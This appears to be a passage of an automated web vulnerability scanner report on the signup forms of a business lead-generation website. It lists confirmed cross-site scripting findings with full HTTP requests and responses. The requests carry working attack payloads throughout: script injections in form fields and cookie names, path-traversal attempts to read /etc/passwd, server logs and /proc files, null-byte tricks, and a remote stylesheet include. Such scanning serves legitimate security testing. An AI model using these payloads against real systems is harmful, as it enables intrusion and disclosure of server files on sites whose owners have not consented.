us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <div class="grid_5 aboutUs" style="margin-left:13px;margin-top:20px;"><a class="secondaryAction" style="margin-left:0;text-decoration: none;"><strong>About InsideUp</strong></a> | <a href="management.html" class="secondaryAction">Management</a> | <a href="pressRelease.html" class="secondaryAction">News Releases</a> | <a href="careers.html" class="secondaryAction">Careers</a> | <a href="contactUs.html" class="secondaryAction">Contact Us</a></div>
<div class="grid_5 aboutUs" style="margin-left:13px;margin-top:25px;"><span>Use InsideUp to Acquire New Business Service Customers</span></div>
<div class="clear"></div>
<div class="grid_1 aboutUs" style="margin-left:13px;margin-top:25px;">
<p>Founded by performance-based marketing, online advertising and lead generation experts, InsideUp operates an online lead generation platform that's dedicated solely to serving the needs of business service providers and their potential customers. InsideUp's online media network, dynamic business-matching lead generation system and leading-edge marketing practices provide business service firms with ready-to-buy qualified and verified sales leads, all delivered in real time.</p>
<p>InsideUp's platform also helps companies who are seeking business services to locate the right service provider for their specific needs. Companies seeking business services use InsideUp's online platform to access helpful vendor selection tools and content plus pricing and feature comparisons from several service vendors. Companies receive competitive bids from only pre-screened, high-quality vendors who meet their specific business needs.</p>
<p>This is all made possible by InsideUp's unique, proprietary platform, which combines next generation business-matching and prospect-profiling technologies with powerful search engine, social media and lead generation technologies.</p>
<p style="margin-bottom:15px;">Clearly most business service providers need a cost-effective and qualified pipeline of fresh sales prospects who are actively interested in what they sell. These providers are keenly interested in all sales prospects who can be converted into long-term, satisfied customers. InsideUp puts these business service providers into direct contact with prospects who are actively in the marketplace to purchase the type of services they provide.</p>
<img src="/images/party-links.jpg" alt="Links" border="0" usemap="#Map">
<map name="Map">
<area shape="rect" coords="2,1,184,64" href="https://twitter.com/VendorSourcing" target="_blank">
<area shape="rect" coords="198,1,379,63" href="http://www.youtube.com/insideupvendors" target="_blank">
<area shape="rect" coords="390,1,575,60" href="http://insideup.com/blogs/b2bsourcing" target="_blank">
</map> </div>
<div class="grid_4">
<div class="aboutUsForm" >
<form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="aboutUs"> <input type="hidden" name="iusrc" value="3"> <input type="hidden" name="parentPage" value="3"> <table width="284" border="0" cellpadding="0" cellspacing="0" style="background-color:#ededed;"> <tr> <td colspan="2" class="head"> To get more information and receive a free copy of white paper "What Every Business Service Marketer Should Know about Online Lead Generation," simply complete the form below: </td> </tr> <tr> <td style="width:100px;">First Name</td> <td style="text-align:left;"> <input name="firstName" type="text" value="Smith"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="Smith"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="3"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="'"--></style></script><script>netsparker(0x0004AB)</script>"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="netsparker@example.com"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="3"/> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td> <input name="companyServices" type="text" value="3"/> </td> </tr> <tr> <td>..
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
companyName POST '"--></style></script><script>alert(0x0004B5)</script>
emailAddress POST netsparker@example.com
firstName POST Smith
lastName POST Smith
password1 POST 3
password2 POST 3
pseudonym POST 3
receiveSpecialOfferEmail POST netsparker@example.com
refererUrl POST http://www.insideup.com/index.html
termsOfService POST 3

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 323
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

companyName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0004B5)%3c%2fscript%3e&emailAddress=netsparker%40example.com&firstName=Smith&lastName=Smith&password1=3&password2=3&pseudonym=3&receiveSpecialOfferEmail=netsparker%40example.com&refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&termsOfService=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:21:30 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=41211F516C1BD275CE97020CCF8C6874; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> <form method="post" action="communitysignup.html"> <input type="hidden" name="refererUrl" value='http://www.insideup.com/index.html'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="3" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 " /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <td> <input type="text" name="emailAddress" value="netsparker@example.com" id="emailAddress" style="width..
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
companyName POST Smith
emailAddress POST '"--></style></script><script>alert(0x0004C8)</script>
firstName POST Smith
lastName POST Smith
password1 POST 3
password2 POST 3
pseudonym POST 3
receiveSpecialOfferEmail POST netsparker@example.com
refererUrl POST http://www.insideup.com/index.html
termsOfService POST 3

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 